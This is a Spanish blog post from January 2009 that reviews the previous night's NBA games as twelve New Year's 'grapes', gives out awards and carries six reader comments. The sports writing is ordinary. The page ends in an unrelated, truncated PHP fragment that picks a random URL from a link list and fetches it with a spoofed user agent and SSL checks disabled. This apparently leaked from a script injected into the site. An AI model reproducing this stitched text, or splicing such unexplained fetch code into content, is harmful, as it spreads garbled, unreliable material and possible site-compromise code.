La crónica (… de las uvas)

01 de January de 2009 por TheDeerHunter

Madrugar, lo que se dice madrugar… hoy ni de coña. Y visualizar partidos en directo anoche, pues como que tampoco. La NBA despidió el fabuloso año baloncestístico 2008 con sus particulares 12 uvas:

Dong!!! – Orlando y su solvencia. Anoche, sin Pietrus, les sobró toda la segunda parte. Le sustituyó Bogans de titular y con él en cancha el parcial fue de +22, claro que en casi 30 minutos anotó tres puntos, recogió dos rebotes y dió una asistencia. Eso se llama remar a favor de la corriente. Los Howard, Lewis y Turkoglu finiquitaron el partido por la vía rápida y, en los minutos de la basura, extraordinarios Marcin Gortat, Cortney Lee, Anthony Johnson y JJ Redick. Ya sólo les falta que el banco funcione tan bien como anoche.

Dong!!! – Chicago y su particular viacrucis de diciembre. Conato de Rookie Wall para Rose y sin él y sin Gooden sufren demasiado. Em cambio parece que Noah nos oyó el otro día y anoche se salió por todos lados ayudado por Gordon, Hughes y Nocioni. Desgraciadamente para ellos ahora mismo Orlando está lejos de ser su guerra. Quizás en Abril tenga que serlo.

Dong!!! – 5 seguidas de Detroit que, en lo positivo se han librado de la “vieja-guardia” dependencia y en lo negativo ya no son, precisamente, esa vieja guardia. Anoche, no obstante, el partido contra los Nets se les puso demasiado fácil con la expulsión de Carter al cuarto de hora de partido.

Dong!!! – Con lo puesto, los Nets siguen en posiciones de playoffs al terminar el año. Y no es por nada, pero visto lo visto si tuvieramos que apostar igual lo hacíamos antes por ellos que por algún otro. No hay que olvidar que todo esto está por encima de los objetivos reales para este curso. Devin Harris y Brook López son dos de las más grandes sorpresas, precísamente los dos únicos Nets que jugaron anoche.

Dong!!! – Algunos daban a los Rockets como favoritos al anillo, pero seguro que no contaban con este McGrady, con este Barry y con los problemas de salud de Battier (bueno, quizás problemas de salud sí se esperaban). Anoche sudaron tinta para ganar a unos buenos Bucks.

Dong!!! – Los Bucks bien dirigidos por Ridnour, otra de las sorpresas del campeonato. Un equipo que si sigue tan centrado y cogiendo confianza tiene calidad para plantar cara. Que se lo digan a los Spurs el otro día.

Dong!!! – Melo y Denver centrados y solventes. Esa sí que es una sorpresa. El de Syracuse ha bajado un peldaño en aportación individual por el bien del equipo y es algo que hay que valorar. Con una buena versión de JR Smith, Nené, K. Martin… es algo que tenía que venir por fuerza. Pero no todos lo hacen. De  lo bueno que es Billups mejor ni hablamos, que ya nos repetimos demasiado.

Dong!!! – Las buenas noticias son que Calderón está haciendo historia en Toronto y que ha vuelto a  los números All-Star que había abandonado por problemas físicos. Sin embargo, el tema de los aleros es penoso y por ahí se le escapa cualquier posibilidad a los Raptors.

Dong!!! – La locura de los Warriors. Nelson no se aburre… o quizás sí, porque se ha pedido a Baron Davis para reyes.

Dong!!! – Rozar el 10% de victorias te asegura el 25% de probabilidades de llevarte el Nº1 del draft y alguna que otra más de ser el peor equipo de la historia (¿8-10 victorias?). Batiendo récords los Thunder… Pero como jugar contra los simpáticos Warriors te asegura buenos números, anoche dieron un paso atrás en su particular carrera de despropósitos.

Dong!!! – La guerra de decepciones ayer tuvo un protagonista e Iguodala se reivindicó como líder de los Sixers. Aún están a tiempo de maquillar la desgracia de temporada. De momento quádruple empate a derrotas en la 8ª plaza del Este. Veremos si la cosa cambia para cuando vuelva Brand.

y Dong!!! – Mirar el box-score de los Clippers hace demasiado daño a la vista. No lo hagáis.

Feliz año 2009 y que se cumplan todos vuestros deseos. Si uno de ellos era salir de la crisis es que sois muy poco originales. Si otro era poder ver las mejores jugadas de ayer, ese os lo cumplimos ahora mismito:

PREMIOS:

MVP: Teníamos ganas de dárselo porque es un crack y porque juega en un equipo de mi… Lo de anoche tiene menos mérito por ser ante los Warriors (que llevan regalando MVPs de la jornada día sí y día también) pero será difícil que se lo volvamos a dar a Kevin Durant. Iguodala también se lo merecía.

RoY: Tienen tela los 23 ptos y 12 reb de Brook contra Detroit. Si perdieron los Nets desde luego no fue su culpa.

La Sorpresa: Vaya tela lo de Gortat, bien Chris Andersen… pero que Bargnani juegue de pívot y te haga un partidazo contra Nené nos deja el culo torcido.

La Decepción: Podríamos hablar de T-Mac, podríamos hablar otra vez de Tyrus Thomas… pero del que menos nos gustaría hablar es quien más se lo merece. Baron Davis va a terminar llegándoselo “ad eternum”.

El mayor esfuerzo en vano: Calderón&Bosh se han dejado la piel para poder llevar a su equipo a la victoria pero dado el palo del otro día y las circunstancias es lícito que es lo demos al bueno de Joakim Noah que se lo ha ganado bien contra Supermán Howard.

Comenta

6 comentarios a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    En el de Chicago hubiese puesto Deng en vez de Dong. Pero enorme artículo, de lectura resacosa y me imagino, que de escritura también.

      Citar

  2. telekoman dice:
    #2

    Bravo Deer, gran artículo, teníendo en cuenta las fechas y la resaca segura….. Me ha encantado el enfoque.
    Lo de Toronto es digno de estudio, la verdad.

      Citar

  3. MagicJohnson32 dice:
    #3

    Sensacional crónica, muy buenas la campanadas. Pero… ¿¿y los cuartos?? 😀

      Citar

  4. Txusma dice:
    #4

    Del cuarto nadie se acuerda. En todo caso del tercero…

      Citar

  5. Viva_Dirk dice:
    #5

    Hablando de Orlando ¿creeis que colocaran a alguien mas en el All-Star a parte de Howard? Turkoglu esta mas flojo que el año pasado, Lewis con 20-6 podria ser pero hay mucha competencia de aleros, a parte de Lebron y Garnett como titulares, están Pierce, Granger, Carter, Butler y Jamison, creo que Lewis de estos deberia ser el 3º por detrás de Pierce y Carter ya que Indiana no va nada bien.

    Pero básicamente mi pregunta es si creeis que Nelson supone una amenaza para Calderón, mi respuesta es que si cuando llegue el All-Star Orlando sigue tercero y Toronto fuera de play-offs, si.

      Citar

  6. Txusma dice:
    #6

    Para mi Nelson no supone una amenaza. Las amenazas son Rondo, Harris e Iverson. Vamos, que creo q se puede ir olvidando de ir al All-Stars a no ser que Toronto mejore espectacularmente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>